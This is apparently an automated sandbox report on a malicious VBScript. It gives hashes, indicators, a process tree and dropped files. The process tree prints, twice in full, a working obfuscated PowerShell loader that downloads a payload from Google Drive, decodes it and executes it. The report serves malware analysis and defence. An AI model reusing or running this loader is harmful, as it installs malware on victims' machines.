6a872532ca240daaf8bd0b676678bfdfcad6f0c72c58f675574d3a1f471bea9f

Reason

Machine shutdown

General

Target

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs
Size

361KB
MD5

fe62c58bcc975e7ebbd268b44a518785
SHA1

696f215f0abe6f1513ddd0a6e8235d99fa5da7fe
SHA256

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58
SHA512

5d70692b8c4b95c61d08c07b1eff6d98ebf58692a10af71281a1fba06a94cb25102803bf1776a5546798427b7a4a76bf62bd3538ed7e7a063f27326df484cc80
SSDEEP

6144:6Q1LaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP/:bKInOiANKdGs

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

4 2424 WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

8 drive.google.com
9 drive.google.com
32 drive.google.com

flow	pid	process
4	2424	WScript.exe

flow	ioc
8	drive.google.com
9	drive.google.com
32	drive.google.com

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs"
1⤵
- Blocklisted process makes network request
PID:2424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
2⤵
PID:1364

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
3⤵
PID:2976

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
3⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
4⤵
PID:4544

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4268

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:3176

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:1444

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
3KB

MD5
1a6abae036bfed2f30e7875c24c40b63

SHA1
84a2a4da8547c7e1eec081a472d35f3d504464be

SHA256
ec6443a747a05c3342830a08091bafa2dc2085ce95efd834a3080212a58d43d9

SHA512
88715349963c50cef53468eeead994d8a51ddcde8af43bd2b618849f848e754ab761a0b332b5cd0e5e14e0c01cda9c3411870803968bc489f5340fd2d04919e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
3KB

MD5
5760c01adc04e034b808ef19d37cbbc1

SHA1
a8514a2b22b3400e104585be86cca83b639e419f

SHA256
b26959c12579c3966ce4db127e98537eddee9c89792779a9861202040dd50710

SHA512
617e3cfc531d684d33713377bd46daa3db1ac2552299479aec47ff91bee7e04001495a44a3b6ab4b336e5682d81d956966e316b270d2125a168ebe81bb3793f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
3KB

MD5
1698249b445f5e2d2c6bd4d5d86031fe

SHA1
28bed2fa25235b38fc3c79695510e094450465cc

SHA256
14291d157025c70d5bf64e6ead298fe3bcfc5553c777b82014e57322f7d835d9

SHA512
ec48da21ca550a4fbd4cf92fce0f4a77b16ddca061491261c40a68b2153bf26d5a54576073b0d067b2336c44c18002c8d57551c73a7a3fe0957f6e4e3839f8da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
389B

MD5
c1532765788a6a3fc4ad90bd18210878

SHA1
0444ee16369fbc60bd78202407597fbf4065b9b1

SHA256
5cf05d2dcc4ce288f715c18ca4862e73e2e32acf925faf58bbc8d10ab59e89ad

SHA512
280f281a45b912108f9d7b2007b1ec5d65ffe84a60cb83af92ca0927b53a15e9d5d3560a23eb7b457bc6c58899c4810a5a51657d76e226947ae0ab7abf2cdfef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
4KB

MD5
2db91f2524cc9f80b5229ab6c3244a75

SHA1
6d84dea33beecff4dfe48d7c936400de89c8907a

SHA256
03841fc6d211e8b1e1e542af904da568cac92c4dc3fcae640a124ece12e3698c

SHA512
25709c4312c3b6ff4a7170a791c89c4e549743a8dc445b538af0cb5967595aeeb9801489db89ed45d630fe6cd916642ed8eeb4fd85161e61106b234c284d6b2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
940B

MD5
9b96937ad62ec5793d150eb46de42b6e

SHA1
5b53ad2dc24651efa824ec4073075cd0d9932707

SHA256
7e33712f0a3fee6ad2f0e4f0927e77f6c084ca3c19f9c7cc5a97c26697e73619

SHA512
520cf78a32619b8dd1eb05df3b4673ea3f394d557d84d9bb3995041c6efdf9667d31890924a502b86d83bd7e76f4aa3ba33d894aacaaadc0c6b2302829319418

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
2KB

MD5
7ebeb941e6c864a65fcaa40f31966257

SHA1
9e72b3cb64e5d6ed033d67c64592ce6295d84e67

SHA256
04ee80938eacc11e192685bb64529a79a69c9ddb990f4e001122693682710f16

SHA512
c7384d59968a0b7127d6269e71236c170b9401923bf8c16edb6cca80fd6c0c5a6cfce8e1de54276e8deeac653d76305789bb242bd59c745f08ed050bf77a1b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gaz1dsbf.ymj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Paps.Thi
Filesize
453KB

MD5
62a2406a56d4b84b4baad2d1c1a7479a

SHA1
2c08075d427f4ceba89260ef86e4469df1b5d398

SHA256
0239013ba33c599fcde5d5da6d6c31d9dd480871312edc0cafb840045da598e6

SHA512
01deccd705b9f4f5baa720c0646e1a09624fd7eb4db6ee716792ecf80c00c585a23a06ff0964bb09742f3716b5863c0c7160af7e1a9636feabcc2575d4c8a8ff

Download Submit
memory/1364-363-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-419-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1364-329-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-331-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-364-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-362-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-361-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1364-320-0x000002295C420000-0x000002295C442000-memory.dmp

Filesize
136KB

Download
memory/1364-330-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-328-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1444-403-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-404-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-417-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-412-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-410-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-411-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-408-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-407-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-406-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-416-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-397-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-415-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
